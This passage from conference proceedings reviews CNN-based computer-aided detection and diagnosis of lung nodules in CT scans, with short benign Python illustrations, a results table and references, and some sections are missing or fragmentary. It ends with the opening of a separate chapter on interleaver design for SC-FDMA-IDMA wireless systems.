human errors such as detection and interpretation errors. On the other hand, a computer-aided detection and diagnosis (CAD) system eliminates the manual process and the problems associated with it. In this work, an analytical review of various CAD systems for
detection and characterization of lung nodules using CT scan images is discussed.
A detailed structure of each component of CAD system is presented. Diverse CAD
systems which are developed on the basis of state-of-the-art convolutional neural
networks (CNN), such as 3D-CNN, transferable CNN, dense convolutional binary
tree network, gated dilated network, and mask region CNN, are addressed. The algorithms' performance is compared based on metrics such as sensitivity (SEN), accuracy (ACC), and area under the curve (AUC). In order to develop a more robust end-to-end
system, coupling between detection and diagnostic components is also explored.
Finally, current challenges faced in analysis and characterization of lung nodule by
the present system and future research opportunities in this field are discussed.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 545
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_44
546 N. Ali and J. Yadav
1 Introduction
Cancer is an abnormal growth of cells that can spread to different body parts. Tumors or neoplasms are lumps or masses of tissue that can be either cancerous (malignant) or non-cancerous (benign). According to the 2020 WHO report on cancer, 18.1 million people had cancer around the world, 9.6 million deaths were caused by it, and the estimated numbers will double by 2040. The most frequently diagnosed cancer is lung cancer (11.6% of all cases), with a mortality rate of 18.6% of all cases [1]. Lung cancer can be
grouped into two types, namely non-small cell lung cancer (NSCLC) and small cell
lung cancer (SCLC). Compared to NSCLC, SCLC grows and spreads quickly; in most cases, by the time it is diagnosed, the cancer has already spread. Especially in this type of situation, early detection is crucial, and a CAD system can be employed to efficiently detect and diagnose cancer. The main requirements of such a system are high accuracy, high sensitivity, and low false positives.
Lung nodule analysis is the most effective form of cancer prevention; it broadly consists of two steps, namely nodule detection and classification into cancerous and non-cancerous [2]. Due to the complexity of lung nodules in shape, size (3–30 mm), density (solid, semi-solid, ground-glass opacity), and location (central, juxta-pleural, juxta-vascular), it is hard to generalize any specific categories [3, 4]. This variability in nodule characterization makes diagnosis a difficult task. However, most studies suggest that large nodules (diameter more than 8 mm) that are semi-solid and lobulated are more likely to be malignant [5, 6]. Effective screening and correct interpretation of lung cancer are crucial steps toward early diagnosis. Advancements in computed tomography (CT) imaging techniques and screening with low-dose CT (LDCT) have shown promising improvements in nodule detection.
With the immense popularity of LDCT screening and the increase in CT scans, the job of the radiologist becomes more difficult, as manual analysis of volumetric CT scans is time-consuming and prone to interpretation and detection errors. To reduce the workload of radiologists, an automatic computer-aided detection and diagnosis system is necessary. The CAD system is an effective cancer control intervention that helps in the early detection of malignancy and in classification [7]. There
has been extensive research on various models and algorithms of the CAD system to make it more efficient in terms of disease detection and classification. A typical CAD system can be grouped into two parts: the computer-aided detection (CADe) system and the computer-aided diagnosis (CADx) system. The CADe system aims at nodule localization, whereas CADx is designed to determine whether a suspicious candidate is benign or malignant and to categorize its type. Specifically, a CAD system consists
of four stages: preprocessing, nodule identification, feature extraction/selection, and
nodule classification [8, 9].
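The four stages can be pictured as a simple pipeline. The stage functions below are toy placeholders standing in for the concrete algorithms discussed later, not a real implementation; all thresholds and heuristics here are assumptions:

```python
import numpy as np

def preprocess(scan):
    """Denoise/normalize the CT volume (placeholder: min-max scaling)."""
    lo, hi = scan.min(), scan.max()
    return (scan - lo) / (hi - lo + 1e-9)

def identify_nodules(scan, threshold=0.8):
    """Placeholder candidate detection: bright voxels only."""
    return scan > threshold

def extract_features(mask):
    """Placeholder features: candidate volume and mean position."""
    coords = np.argwhere(mask)
    return {"volume": len(coords),
            "centroid": coords.mean(axis=0) if len(coords) else None}

def classify(features):
    """Placeholder rule standing in for the CNN classifier."""
    return "suspicious" if features["volume"] > 10 else "benign"

np.random.seed(0)
scan = np.random.rand(16, 16, 16)
label = classify(extract_features(identify_nodules(preprocess(scan))))
```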
In this review, the structure of the CAD system is first briefly presented along with the various algorithms developed for each component. Some of the efficient state-of-the-art
CNN schemes such as 3D-CNN (feature extraction using residual network) [10], V-
Net [11], transferable texture CNN [12], U-Net [13], faster region CNN (RCNN) [14],
mask-RCNN [15], RetinaNet (R-Net), Inflated 3D R-Net (I3DR-Net) [16], and Leaky
Integrate and Fire Networks (LIF-Nets) [17] are also explored. Compared to tradi-
tional machine learning algorithms, deep learning has shown significant improve-
ment with respect to nodule identification and characterization. The main aim of this
review is to explicitly present each component along with reliable algorithms devel-
oped in the respective domain, as described in Fig. 1. The experimental benchmarks
necessary for the research work in this field like database and evaluation metrics
are also emphasized. Finally, existing challenges faced by CAD system in accurate
diagnosis of lung nodule, research trends, and future developments in CAD system
are discussed.
The work is divided into four sections: the first section describes the anatomical structure of the CAD system along with the various algorithms developed; the second section covers the experimental benchmarks; the third section compares the algorithms and methods surveyed; and the last section provides a brief conclusion with future research prospects.
The CAD system is broadly categorized into two modules: one used for nodule detection and localization, called the computer-aided detection (CADe) system, and the other used for classification of detected nodules into cancerous and non-cancerous, called the computer-aided diagnosis (CADx) system [18]. To be applicable to clinical diagnosis and reduce radiologist workload, these systems have to be combined into an end-to-end system that does the complete work of detecting and classifying lung cancer [2].
The CADe system for nodule detection in CT scans can be divided into two parts. The first part consists of the image processing components: preprocessing (lung segmentation and nodule enhancement) and nodule detection (initial nodule identification and nodule segmentation) [15, 19]. The second part consists of the feature analysis components [20]. The aim of the image processing components is to detect, i.e., localize and segment, suspicious regions in CT images with high sensitivity; as a result, false positives also increase. The purpose of the feature analysis components is to reduce false positives by analyzing nodule features while maintaining high detection sensitivity. For example, FPs are reduced by varying the slab thickness in maximum intensity projection (MIP) images [21]. CADx schemes are developed to categorize detected nodules as benign or malignant [22–24]. The input to this system is the nodule location, which can be fed manually or by coupling with the CADe system. Generally, the CADx system involves the following stages: nodule segmentation [25, 26], feature engineering/learning (feature extraction/selection), and nodule classification [27].
CNN-based networks show better results than traditional machine learning methods.
End-to-end CAD systems consist of a combination of CADe and CADx schemes [16, 28], with components as shown in Fig. 2. A system that only detects nodules without characterizing them is not enough for clinical application; thus, a complete CAD system that performs end-to-end detection and classification is necessary. In the next section, the components of the CAD system are covered extensively.
2.1 Preprocessing
The images fed into the system are processed images, as CT images are 3D and defiled by noise and artifacts [25]. Preprocessing is done to eliminate noise and enhance contrast. Preprocessing in general is an image processing stage that performs tasks such as noise elimination [28], lung segmentation and mending of the lung contour [20, 29, 30], and nodule enhancement [19, 31]. CT scan images contain two types of noise: radiographic noise, caused by electronic elements, and anatomical noise, caused by the projection of local anatomical structures such as ribs and pulmonary vessels onto chest scans, which makes nodule detection a difficult task. To reduce noise and enhance nodule-like structures, CT images are fed through filters; commonly used are the median filter, Gaussian filter [32], dot enhancement filter, NLM filter, histogram equalization, and adaptive Wiener filter [33]. Data augmentation is crucial while training the model, as it helps reduce overfitting and thus maximizes transfer learning. Ozdemir et al. [2] performed transform augmentation consisting of 3D rotation, reflection, and 3D scaled samples.
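Rotation and reflection augmentation of a 3D volume, of the kind used in [2], can be sketched with plain NumPy. Scaling is omitted here, and the axis choices are illustrative assumptions:

```python
import numpy as np

def augment_3d(volume, k=1, flip_axis=0):
    """Return a rotated and reflected copy of a 3D CT volume.

    k         : number of 90-degree rotations in the (1, 2) plane
    flip_axis : axis along which to mirror the volume
    """
    rotated = np.rot90(volume, k=k, axes=(1, 2))   # in-plane rotation
    return np.flip(rotated, axis=flip_axis)        # reflection

# Toy volume: 2 axial slices of 4x4 voxels.
volume = np.arange(2 * 4 * 4, dtype=float).reshape(2, 4, 4)
augmented = augment_3d(volume, k=1, flip_axis=0)
```

Because the transforms only permute voxels, the label of a nodule patch is preserved, which is what makes them safe augmentations for training.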
Lung segmentation: Nodules are present within the lung, so the first requirement for nodule detection is to segment the lung. The steps involved in lung segmentation are described in Fig. 3.
Kuo et al. [19] first optimized the images using an adaptive Wiener filter; lung segmentation is then performed using a fast Otsu algorithm along with an edge search method similar to hole-filling and histogram shifting. Rey et al. [20] applied Otsu-algorithm-based lung segmentation, used a morphological closing operator for filling interior lung cavities, and used a 3D region growing algorithm for lung isolation. Zhang et al. [29] performed four steps to extract the lung parenchyma: histogram-based threshold segmentation to obtain the gray levels for lung mask generation; removal of anatomical noise, with a padding operator used for hole-filling; lung contour mending to include juxta-pleural nodules, which would otherwise be eliminated; and segmentation of the corrected lung parenchyma contour. Gong et al. [34] adopted the Otsu threshold segmentation method, with a 3D region growing algorithm applied to segment and extract the lung lobes. Gong et al. [13] obtained the lung region mask by using convex hull and dilation operations to make sure it includes all nodules. To overcome the juxta-pleural nodule issue (these nodules are attached to the chest wall and generally get excluded as noise when lung segmentation is performed), Chung et al. [35] used the Chan–Vese (CV) model along with a Bayesian approach.
After segmentation of the lung, the next stage is nodule identification, which involves candidate detection and reduction of false positives [36, 37]. Lung nodules vary in shape, size, density, location, and texture, and detecting them is thus a tedious task. Due to this variability, various techniques have been developed over the decades. Traditional machine learning tools were time-consuming and lacked learning adaptability. With the enormous development of deep convolutional neural networks (DCNNs), automatic nodule detection and characterization performance have improved tremendously [13–18, 28].
Shaukat et al. [31] first enhanced nodule images using a multi-scale dot enhancement filter based on the Hessian matrix, and then detected lung nodules using optimal thresholding on the enhanced images. Zheng et al. [21, 38] used four streams of maximum intensity projection (MIP) images with four slab thicknesses to train 2D CNNs for localization and nodule detection. Zhang et al. [29] presented an efficient nodule detection system based on a multi-scene deep learning framework (MSDLF) with a vessel removing filter, applying a four-channel CNN to four levels of nodule. Kuo et al. [19] suggested using a support vector machine (SVM) twice to reduce false positives: once for nodule detection using four 2D features and again for classification using eleven 3D features. Micro-nodule (diameter smaller than 3 mm) detection is the most difficult job, and Monkam et al. [39] developed a system based on ensemble learning of multi-view 3D CNNs to distinguish between micro-nodules and non-nodules. Chenyang et al. [40] proposed a jointly optimized nodule segmentation and classification (JNSC) method that adopts V-Net as the backbone. Cai et al. [15] exploited a two-stage Mask R-CNN for nodule detection and segmentation, where the first stage is a region proposal network (RPN) and the second stage outputs confidence. Li et al. [25] adopted a generalized method of moments fuzzy C-means (GMMFCM) algorithm for segmentation of pulmonary nodules. To eliminate false positives, Chung et al. [35] used concave point detection and circle or ellipse Hough transforms.
Once nodules are identified, numerous nodule candidates are generated, most of which are false positives. Features are measurable distinctive attributes of the segmented regions and represent prominent characteristics of nodules. Features can be grouped based on shape, size, density, texture, and intensity [41, 42]. Wang et al. [36] proposed a mathematical descriptor using neighbor centroid clustering for spatial
Computer-Aided Detection and Diagnosis of Lung Nodules … 551
2.4 Classification
3 Experimental Benchmarks
One of the most widely used publicly available databases is the Lung Image Database Consortium and Image Database Resource Initiative (LIDC-IDRI), one of the largest public databases for lung cancer. It consists of 1018 cases that include clinical thoracic CT scans with annotations in XML format [49]. The National Lung Screening Trial (NLST) dataset enrolled around 54,000 participants (2002–2004); data on cancer diagnoses and deaths were collected through December 31, 2009 [50]. The Vision and Image Analysis group and International Early Lung Cancer Action Program (VIA/I-ELCAP) database consists of 50 LDCT scans of 1.25 mm slice thickness; the nodule sizes in this database are quite small [51]. The Nederlands–Leuvens Longkanker Screening Onderzoek (NELSON) trial consists of LDCT scans of approximately 15,822 participants. Each set of images, in DICOM format, has 1 mm slice thickness with 0.7 mm overlap between slices; annotations were generated either with LungCare software or manually [52].
Accuracy, TPR, and FPR. The parameters required for the calculation of accuracy, the true positive rate (TPR), and the false positive rate (FPR) are: true positives (TP), true negatives (TN), false positives (FP), and false negatives (FN) [10, 36]. TPR, also known as sensitivity or recall, is given by Eq. 1; FPR is given by Eq. 2; and accuracy, which measures exactness against the original samples, is given by Eq. 3.

Sensitivity/TPR/Recall = TP / (TP + FN)    (1)

FPR = FP / (FP + TN)    (2)

Accuracy = (TP + TN) / (TP + TN + FP + FN)    (3)
CPM = (1/7) Σ_{i ∈ FPs} s(i),  FPs = {0.125, 0.25, 0.5, 1, 2, 4, 8}    (4)
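Equations (1)–(4) translate directly into code. The confusion counts and per-rate sensitivities below are made up purely for illustration:

```python
def sensitivity(tp, fn):
    return tp / (tp + fn)                      # Eq. (1): TPR / recall

def false_positive_rate(fp, tn):
    return fp / (fp + tn)                      # Eq. (2)

def accuracy(tp, tn, fp, fn):
    return (tp + tn) / (tp + tn + fp + fn)     # Eq. (3)

def cpm(sens_at_fp):
    """Eq. (4): mean sensitivity at the 7 standard FP/scan rates."""
    rates = (0.125, 0.25, 0.5, 1, 2, 4, 8)
    return sum(sens_at_fp[r] for r in rates) / 7.0

# Hypothetical confusion counts for a nodule detector on 1000 candidates:
tp, tn, fp, fn = 90, 880, 20, 10
sens = sensitivity(tp, fn)        # 0.9
acc = accuracy(tp, tn, fp, fn)    # 0.97
```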
4 Discussion
CAD systems based on various algorithms are compared on two factors: how efficiently the system can detect a nodule, and how well it discriminates nodules into benign and malignant with reduced FPs. Table 1 compares the different algorithms used for nodule detection, and Table 2 compares the classification systems.
5 Conclusion
Table 1 Comparison between different nodule detection models

S. No | First author, publication year | Algorithm | Outcome
1 | Ye et al. [11], 2020 | Modified V-Net, SVM classifier | 0.934 (SEN at 8 FPs/scan)
2 | Kuo et al. [19], 2020 | SVM | 91% (SEN)
3 | Rey et al. [20], 2020 | SVM (C-SVC) | 82.9% (SEN)
4 | Zheng et al. [21], 2020 | MIP, slab thickness 9 mm | 90% (SEN)
5 | Li et al. [25], 2020 | GMMFCM | 0.9998 (ACC), 0.9756 (SEN)
6 | Zhang et al. [29], 2020 | MSDLF | 98.7% (efficiency)
7 | Gu et al. [30], 2020 | Vessel suppression | 0.986 (SEN)
8 | Roy et al. [32], 2020 | Unsupervised method | 0.90 (SEN), 0.95 (ACC)
  |  | Supervised method | 0.84 (SEN), 0.95 (ACC)
9 | Gong et al. [37], 2020 | 3D-CenterNet | 90.6 (CPM)
10 | Tan et al. [53], 2020 | 3D-CNN | 0.990 (SEN)
challenging task; thus, the accurate elimination of vessels and anatomical noise will ensure reduced false positives (FPs). For future research, in order to address the database problem, unsupervised learning methodologies need to be explored further, along with multi-modality fusion techniques. Noise elimination techniques for the reduction of false positives also need more emphasis.
References
1. WHO Report on Cancer: Setting Priorities, Investing Wisely and Providing Care for All. World Health Organization, Geneva, Switzerland (2020).
2. Ozdemir, O., Russell, R. L., & Berlin, A. A. (2020). A 3D probabilistic deep learning system
for detection and diagnosis of lung cancer using low-dose CT scans. IEEE Transactions on
Medical Imaging, 39(5), 1419–1429. https://doi.org/10.1109/TMI.2019.2947595
3. Siegel, R. L., Miller, K. D., & Jemal, A. (2020). Cancer statistics, 2020. Cancer Journal for
Clinicians, 70(1), 7–30. https://doi.org/10.3322/caac.21590
4. De Koning, H. J. (2020). Reduced lung-cancer mortality with volume CT screening in a randomized trial. New England Journal of Medicine, 382(6), 503–513. https://doi.org/10.1056/nejmoa1911793
5. Snoeckx, A., Reyntiens, P., Desbuquoit, D., Spinhoven, M. J., Van Schil, P. E., Meerbeeck, J.
P., & Parizel, P. M. (2018). Evaluation of the solitary pulmonary nodule: Size matters, but do
not ignore the power of morphology. Insights into Imaging, 9(1), 73–86.
6. Zhou, Q. (2016). China national guideline of classification, diagnosis and treatment for lung
nodules. Zhongguo Zhi, 19(12), 793–798. https://doi.org/10.3779/j.issn.1009-3419.2016.12.12
7. Cressman, S. (2017). The cost-effectiveness of high-risk lung cancer screening and drivers of
program efficiency. Journal of Thoracic Oncology, 12(8), 1210–1222. https://doi.org/10.1016/
j.jtho.2017.04.021
8. Gu, J., Tian, Z., & Qi, Y. (2020). Pulmonary nodules detection based on deformable convolution.
IEEE Access, 8, 16302–16309. https://doi.org/10.1109/ACCESS.2020.2967238
9. Hussein, S., Kandel, P., Bolan, C. W., Wallace, M. B., & Bagci, U. (2019). Lung and pancreatic
tumour characterization in the deep learning era: Novel supervised and unsupervised learning
approaches. IEEE Transactions on Medical Imaging, 38(8), 1777–1787. https://doi.org/10.
1109/TMI.2019.2894349
10. Tong, C., et al. (2021). Pulmonary nodule classification based on heterogeneous features
learning. IEEE Journal on Selected Areas in Communications, 39(2), 574–581. https://doi.
org/10.1109/JSAC.2020.3020657
11. Ye, Y., Tian, M., Liu, Q., & Tai, H.-M. (2020). Pulmonary nodule detection using v-net and
high-level descriptor based SVM classifier. IEEE Access, 8, 176033–176041. https://doi.org/
10.1109/ACCESS.2020.3026168
12. Ali, I., Muzammil, M., Haq, I. U., Khaliq, A. A., & Abdullah, S. (2020). Efficient lung nodule
classification using transferable texture convolutional neural network. IEEE Access, 8, 175859–
175870. https://doi.org/10.1109/ACCESS.2020.3026080
13. Gong, L., Jiang, S., Yang, Z., et al. (2019). Automated pulmonary nodule detection in CT
images using 3D deep squeeze-and-excitation networks. International Journal of Computer
Assisted Radiology and Surgery, 14, 1969–1979. https://doi.org/10.1007/s11548-019-01979-1
14. Su, Y., Li, D., & Chen, X. (2020). Lung nodule detection based on faster R-CNN frame-
work. Computer Methods and Programs in Biomedicine. https://doi.org/10.1016/j.cmpb.2020.
105866
15. Cai, L., Long, T., Dai, Y., & Huang, Y. (2020). Mask R-CNN-based detection and segmentation
for pulmonary nodule 3D visualization diagnosis. IEEE Access, 8, 44400–44409. https://doi.
org/10.1109/ACCESS.2020.2976432
16. Harsono, I. W., Liawatimena, S., & Cenggoro, T. W. (2020). Lung nodule detection and classification from Thorax CT-scan using RetinaNet with transfer learning. Journal of King Saud University-Computer and Information Sciences. https://doi.org/10.1016/j.jksuci.2020.03.013. ISSN 1319-1578.
17. Shi, Y., Li, H., Zhang, H., Wu, Z., & Ren, S. (2020). Accurate and efficient LIF-Nets for 3D
detection and recognition. IEEE Access, 8, 98562–98571. https://doi.org/10.1109/ACCESS.
2020.2995886
18. Masood, A., et al. (2020). Automated decision support system for lung cancer detection and
classification via enhanced RFCN with multilayer fusion RPN. IEEE Transactions on Industrial
Informatics, 16(12), 7791–7801. https://doi.org/10.1109/TII.2020.2972918
556 N. Ali and J. Yadav
19. Kuo, C-F. J., Huang, C-C., Siao, J-J., Hsieh, C-W., Huy, V. Q., Ko, K-H., & Hsu, H-H. (2020).
Automatic lung nodule detection system using image processing techniques in computed
tomography. Biomedical Signal Processing and Control, 56, 101659. https://doi.org/10.1016/
j.bspc.2019.101659. ISSN 1746-8094.
20. Rey, A., Arcay, B., & Castro, A. (2020). A hybrid CAD system for lung nodule detection using
CT studies based in soft computing. Expert Systems with Applications, 114259. https://doi.org/
10.1016/j.eswa.2020.114259. ISSN 0957-4174.
21. Zheng, S., Cui, X., Vonder, M., Veldhuis, R. N. J., Ye, Z., Vliegenthart, R., Oudkerk, M., & van Ooijen, P. M. A. (2020). Deep learning-based pulmonary nodule detection: Effect of slab thickness in maximum intensity projections at the nodule candidate detection stage. Computer Methods and Programs in Biomedicine, 196, 105620. https://doi.org/10.1016/j.cmpb.2020.105620. ISSN 0169-2607.
22. Suresh, S., & Mohan, S. (2019). NROI based feature learning for automated tumor stage
classification of pulmonary lung nodules using deep convolutional neural networks. Journal
of King Saud University-Computer and Information Sciences. https://doi.org/10.1016/j.jksuci.
2019.11.013. ISSN 1319-1578.
23. Al-Shabi, M., Lee, H. K., & Tan, M. (2019). Gated-dilated networks for lung nodule classifi-
cation in CT scans. IEEE Access, 7, 178827–178838. https://doi.org/10.1109/ACCESS.2019.
2958663
24. Veasey, B. P., Broadhead, J., Dahle, M., Seow, A., & Amini, A. A. (2020). Lung nodule malig-
nancy prediction from longitudinal CT scans with siamese convolutional attention networks.
IEEE Open Journal of Engineering in Medicine and Biology, 1, 257–264. https://doi.org/10.
1109/OJEMB.2020.3023614
25. Li, X., Li, B., Liu, F., Yin, H., & Zhou, F. (2020). Segmentation of pulmonary nodules using a
GMM fuzzy C-Means algorithm. IEEE Access, 8, 37541–37556. https://doi.org/10.1109/ACC
ESS.2020.2968936
26. Sun, Y., Tang, J., Lei, W., & He, D. (2020). 3D Segmentation of pulmonary nodules based on
multi-view and semi-supervised. IEEE Access, 8, 26457–26467. https://doi.org/10.1109/ACC
ESS.2020.2971542
27. Xie, Y., et al. (2019). Knowledge-based collaborative deep learning for benign-malignant lung
nodule classification on chest CT. IEEE Transactions on Medical Imaging, 38(4), 991–1004.
https://doi.org/10.1109/TMI.2018.2876510
28. Li, G., et al. (2020). Study on the detection of pulmonary nodules in CT images based on deep
learning. IEEE Access, 8, 67300–67309. https://doi.org/10.1109/ACCESS.2020.2984381
29. Zhang, Q., & Kong, X. (2020). Design of automatic lung nodule detection system based on
multi-scene deep learning framework. IEEE Access, 8, 90380–90389. https://doi.org/10.1109/
ACCESS.2020.2993872
30. Gu, X., Xie, W., Fang, Q., Zhao, J., & Li, Q. (2020). The effect of pulmonary vessel suppression
on computerized detection of nodules in chest CT scans. Medical Physics, 47, 4917–4927.
https://doi.org/10.1002/mp.14401
31. Shaukat, F., Raja, G., Ashraf, R., et al. (2019). Artificial neural network based classification
of lung nodules in CT images using intensity, shape and texture features. Journal of Ambient
Intelligence and Humanized Computing, 10, 4135–4149. https://doi.org/10.1007/s12652-019-
01173-w
32. Roy, R., Banerjee, P., & Chowdhury, A. S. (2020). A level set based unified framework for
pulmonary nodule segmentation. IEEE Signal Processing Letters, 27, 1465–1469. https://doi.
org/10.1109/LSP.2020.3016563
33. Samundeeswari, P., & Gunasundari, R. (2020). A novel multilevel hybrid segmentation and
refinement method for automatic heterogeneous true NSCLC nodules extraction. In 2020
5th International Conference on Devices, Circuits and Systems (ICDCS), Coimbatore, India
(pp. 226–235). https://doi.org/10.1109/ICDCS48716.2020.243586
34. Gong, J., Liu, J., Wang, L., Sun, X., Zheng, B., & Nie, S. (2018). Automatic detection
of pulmonary nodules in CT images by incorporating 3D tensor filtering with local image
feature analysis. Physica Medica, 46, 124–133. https://doi.org/10.1016/j.ejmp.2018.01.019.
ISSN 1120-1797.
35. Chung, H., Ko, H., Jeon, S. J., Yoon, K. H., & Lee, J. (2018). Automatic lung segmentation
with Juxta-Pleural nodule identification using active contour model and bayesian approach.
IEEE Journal of Translational Engineering in Health and Medicine, 6, 1–13, 1800513. https://
doi.org/10.1109/JTEHM.2018.2837901
36. Wang, B., et al. (2020). A fast and efficient CAD system for improving the performance of
malignancy level classification on lung nodules. IEEE Access, 8, 40151–40170. https://doi.org/
10.1109/ACCESS.2020.2976575
37. Gong, Z., Li, D., Lin, J., Zhang, Y., & Lam, K.-M. (2020). Towards accurate pulmonary nodule
detection by representing nodules as points with high-resolution network. IEEE Access, 8,
157391–157402. https://doi.org/10.1109/ACCESS.2020.3019104
38. Zheng, S., Guo, J., Cui, X., Veldhuis, R. N. J., Oudkerk, M., & van Ooijen, P. M. A. (2020).
Automatic pulmonary nodule detection in CT scans using convolutional neural networks based
on maximum intensity projection. IEEE Transactions on Medical Imaging, 39(3), 797–805.
https://doi.org/10.1109/TMI.2019.2935553
39. Monkam, P., et al. (2019). Ensemble learning of multiple-view 3D-CNNs model for micro-
nodules identification in CT images. IEEE Access, 7, 5564–5576. https://doi.org/10.1109/ACC
ESS.2018.2889350
40. Chenyang, L., & Chan, S.-C. (2020). A joint detection and recognition approach to lung cancer
diagnosis from CT images with label uncertainty. IEEE Access, 8, 228905–228921. https://doi.
org/10.1109/ACCESS.2020.3044941
41. Zhou, Z., Li, S., Qin, G., Folkert, M., Jiang, S., & Wang, J. (2020). Multi-Objective based
radiomic feature selection for lesion malignancy classification. IEEE Journal of Biomedical
and Health Informatics, 24(1), 194–204. https://doi.org/10.1109/JBHI.2019.2902298
42. Khan, S. A., Nazir, M., Khan, M. A., et al. (2019). Lungs nodule detection framework
from computed tomography images using support vector machine. Microscopy Research and
Technique, 82, 1256–1266. https://doi.org/10.1002/jemt.23275
43. Sahu, P., Yu, D., Dasari, M., Hou, F., & Qin, H. (2019). A lightweight multi-section CNN for
lung nodule classification and malignancy estimation. IEEE Journal of Biomedical and Health
Informatics, 23(3), 960–968. https://doi.org/10.1109/JBHI.2018.2879834
44. Wang, W., et al. (2019). Nodule-Plus R-CNN and deep self-paced active learning for 3D
instance segmentation of pulmonary nodules. IEEE Access, 7, 128796–128805. https://doi.
org/10.1109/ACCESS.2019.2939850
45. Saba, T., Sameh, A., Khan, F., et al. (2019). Lung nodule detection based on ensemble of hand
crafted and deep features. Journal of Medical Systems, 43, 332. https://doi.org/10.1007/s10
916-019-1455-6
46. Zhang, B., et al. (2019). Ensemble learners of multiple deep CNNs for pulmonary nodules
classification using CT images. IEEE Access, 7, 110358–110371. https://doi.org/10.1109/ACC
ESS.2019.2933670
47. Zhai, P., Tao, Y., Chen, H., Cai, T., & Li, J. (2020). Multi-Task learning for lung nodule
classification on chest CT. IEEE Access, 8, 180317–180327. https://doi.org/10.1109/ACCESS.
2020.3027812
48. Cao, H., et al. (2019). Multi-Branch ensemble learning architecture based on 3D CNN for false
positive reduction in lung nodule detection. IEEE Access, 7, 67380–67391. https://doi.org/10.
1109/ACCESS.2019.2906116
49. Armato, S. G. (2011). The lung image database consortium (LIDC) and image database resource initiative (IDRI): A completed reference database of lung nodules on CT scans. Medical Physics, 38(2), 915–931. https://doi.org/10.1118/1.3528204
50. NLST Datasets. Accessed: Aug. 15, 2020. [Online]. Available: https://cdas.cancer.gov/datasets/nlst/
51. VIA/I-ELCAP Datasets. Accessed: Aug. 15, 2020. [Online]. Available: http://www.via.cornell.
edu/databases/lungdb.html
52. Ru Zhao, Y., Xie, X., de Koning, H. J., Mali, W. P., Vliegenthart, R., & Oudkerk, M. (2011).
NELSON lung cancer screening study. Cancer Imaging, 11(1A), S79–S84. https://doi.org/10.
1102/1470-7330.2011.9020
53. Tan, M., Wu, F., Yang, B., Ma, J., Kong, D., Chen, Z., & Long, D. (2020). Pulmonary nodule
detection using hybrid two-stage 3D CNNs. Medical Physics, 47, 3376–3388. https://doi.org/
10.1002/mp.14161
54. Kuang, Y., Lan, T., Peng, X., Selasi, G. E., Liu, Q., & Zhang, J. (2020). Unsupervised multi-
discriminator generative adversarial network for lung nodule malignancy classification. IEEE
Access, 8, 77725–77734. https://doi.org/10.1109/ACCESS.2020.2987961
55. Masood, A., et al. (2020). Cloud-Based automated clinical decision support system for detection
and diagnosis of lung cancer in chest CT. IEEE Journal of Translational Engineering in Health
and Medicine, 8, 1–13, 4300113. https://doi.org/10.1109/JTEHM.2019.2955458
Efficient Interleaver Design
for SC-FDMAIDMA Systems
Abstract In many research fields, the use of multiple interleavers has recently attracted growing interest. Interleavers that require less memory space for storing chip patterns are considered more efficient. We propose efficient non-orthogonal interleavers based on a quadratic permutation polynomial with maximum spread, combined with cyclic shifting in some steps. Our work targets good user separation in single-carrier frequency division multiple access with interleave division multiple access (SC-FDMA-IDMA) systems. This technique offers an alternative to generating random permutations, with lower memory demand and complexity in SC-FDMA-IDMA systems. The findings show that the random interleavers created by the proposed methodology are sufficient to be used in the SC-FDMA-IDMA scheme without sacrificing its performance.
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 559
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_45
560 R. Agarwal and M. K. Shukla
they proposed a way to tie the interleavers together. With defined entry variables, it becomes hard to establish sufficient polynomials for pseudorandom interleavers as the number of users K grows, and applications have to accommodate either the pattern generation time or the integrated interleavers. The focus of the shifting is on the integration between the multiple interleavers. We therefore want to provide a basic rule for the construction of interleavers that decreases the memory needed. Our goal is to create a non-orthogonal interleaver that works like a random interleaver and satisfies the two construction requirements, definition and reproduction; i.e., only a few input values need to be transmitted to efficiently regenerate the interleaving pattern at the receiver. In this paper, the maximum-spread quadratic permutation polynomial is used to generate random interleavers for SC-FDMA-IDMA systems.
SC-FDMA-IDMA is a hybrid multiple access framework that retains several desirable SC-FDMA and IDMA attributes; its BER performance is very close to that of OFDM-IDMA. In this paper, the SC-FDMA-IDMA method is selected because it offers low complexity, high accessibility, and moderate signal interference, especially in comparison with IDMA and other equivalents, such as OFDM-IDMA based on orthogonal FDMA, in Yadav et al. [6]. The basic NOMA concept is to support many users over the same time, frequency, and space resources. Non-orthogonal multiple access (NOMA) was established as one of the main features considered for the 5G new radio (NR) mobile communication system. NOMA offers a number of presumed desirable advantages, such as increased spectrum performance, reduced latency with high reliability, and tremendous accessibility. NOMA's primary use case is the uplink, where many user equipments (UEs) attempt to use the same time resources and expect the same predicted system benefit. The NOMA system's potential advantage lies in better spectrum efficiency relative to conventional orthogonal MA (OMA), where each user enjoys a dedicated transmit service, a dedicated resource allocation, and reference signals for secure transmission, as presented by Lai et al. [7]. Such a feature is critical for ultra-reliable low-latency communication (URLLC) systems. Such codes may or may not reflect a specified structure. NOMA spreading schemes can be grouped into short and long spreading strategies. Multi-user shared access (MUSA) can be considered an example of a short-spreading NOMA system, where a predefined set of non-orthogonal sequences is used for user separation, as in [8]. A key feature of the IDMA policy is that it does not simply treat multi-user interference as additional noise. During the detection process, a priori LLRs continue to be developed by updating the relevant signal and distortion statistics. A baseline evaluation of SC-FDMA-IDMA exists in the literature [8–10]. Section 2 describes the interleaver design, Sect. 3 explains the system model of the SC-FDMA-IDMA system, Sect. 4 shows the simulation results, and the last section concludes the paper.
Efficient Interleaver Design for SC-FDMAIDMA Systems 561
2 Interleaver Design
2^(2k−1) = ICN (1)

We obtain the value of k from Eq. (1) and use it in Eq. (2) to find the initial interleaver:

f(x) = ((2^k − 1)x + 2^(k+1)x^2) mod 2^(2k−1) (2)
(3) To apply the permutation to the column indices, the initial interleaver pattern (3,1,4,0,2,5) obtained from (2) is divided by the row count IR, and the remainder of each element gives the first row; the next rows are generated by rotation, as shown in Table 2. Storage in the column indices after the permutation is shown in Table 3.
(4) For the row permutation, begin with the initial interleaver; the other rows of the matrix are generated by a simple one-step cyclic shift of the previous interleaving pattern, as in Table 4, and the last Table 5 shows the final storage in the matrix after the row permutation.
